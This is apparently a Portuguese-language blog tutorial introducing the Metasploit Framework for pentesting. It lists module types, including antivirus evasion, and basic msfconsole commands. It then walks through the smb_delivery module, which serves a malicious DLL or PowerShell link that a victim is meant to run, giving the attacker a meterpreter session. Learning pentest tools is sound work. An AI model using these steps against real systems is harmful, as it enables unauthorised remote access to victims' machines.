Em cybersecurity um “exploit” é uma forma de “explorar” uma determinada vulnerabilidade através de um código seja um software ou um código.
Ao fazer um pentest é uma das tarefas do profissional é analisar o ambiente e identificar se existe alguma vulnerabilidade que possa ser explorada e como explorar. Esse é um processos de Análise de Risco.
São muitas a “brechas” que podem ser exploradas e de diversas maneiras. Quando estamos falando de sistemas uma das ferramentas que permite de maneira fácil explorar brechas é o Metasploit Framework.
O MSF é uma das ferramentas de auditoria de segurança mais úteis disponíveis hoje gratuitamente aos profissionais de segurança, pois é um conjunto com muitos recursos de analise de segurança que vão além da simples exploração de uma determinada brecha.
Existe uma lista enorme de “exploits” de nível comercial e um ambiente de desenvolvimento de exploits, até ferramentas de coleta de informações em rede e plugins de vulnerabilidade na Web, o Metasploit Framework é um ambiente completo e impressionante.
O Metasploit está escrito em Ruby e está em desenvolvimento há muitos anos.
Eu uso o Kali linux e gosto de usar o Metasploit através dele. E neste artigo eu estou usando o Metasploit na ultima versão do Kali 2020. E você pode iniciar usando comando msfconsole:
O Metasploit contém diversos módulos e vamos entender o que faz cada um.
- exploits – Módulo que contém milhares de exploits
- payloads – Código que é executado remotamente com o exploit
- auxiliary – Contém scanners de portas, fuzzers, sniffers e muito mais.
- nops – mantêm os tamanhos payloads consistentes
- post – Recursos usados pós exploração
- encoders – Codificadores que garante o payload ser executado.
- evasion (somente no Metasploit 5) – Usados para “evadir” antivírus
Os comandos básicos são:
- msf > show – Comando utilizado para exibir informação
- msf > use – Comando utilizado para carregar um modulo
- msf > show options – Exibe as opções do modulo carregado
- msf > set – Define opções que você consultou com o comando show options
- msf > info – Exibe info do modulo carregado
- msf > search – Comando importante, pois ajuda a encontrar exploits, payloads e outros recursos. Exemplo msf > search type:exploit platform:windows SMB
- msf > back – Voltar
- msf > exit – Sair do Metasploit
https://www.offensive-security.com/metasploit-unleashed/
Depois que uma exploração acontecer vamos ter acesso ao MeterPreter e pode executar diversos comandos.
Um exemplo bem simples de usar o Metasploit é usando um payload através de um servidor que aceita comunicação SMB Atualmente suporta DLLs e Powershell.
use exploit/windows/smb/smb_delivery
set srvhost 192.168.x.x
exploit
use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109
msf exploit(windows/smb/smb_delivery) > exploit
Isso irá gerar um link para o arquivo DLL ou Powershell malicioso, no qual você envia o link para o seu destino (alvo) e aguarde a ação dele.
Assim que a vítima executar o código malicioso teremos uma sessão do “meterpreter” Metasploit.
Exploits, Playloads e ShellCode
No vídeo abaixo eu usao o metasploit para criar um payload e explorar um sistema Windows.
1 Trackback / Pingback